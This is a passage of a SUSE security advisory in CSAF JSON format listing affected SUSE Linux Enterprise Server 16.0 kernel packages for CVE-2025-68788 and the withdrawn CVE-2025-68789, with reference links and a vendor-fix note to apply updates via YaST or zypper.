"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68788"
},
{
"cve": "CVE-2025-68789",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68789"
}
],
"notes": [
{
"category": "general",
"text": "This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68789",
"url": "https://www.suse.com/security/cve/CVE-2025-68789"
},
{
"category": "external",
"summary": "SUSE Bug 1256781 for CVE-2025-68789",
"url": "https://bugzilla.suse.com/1256781"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
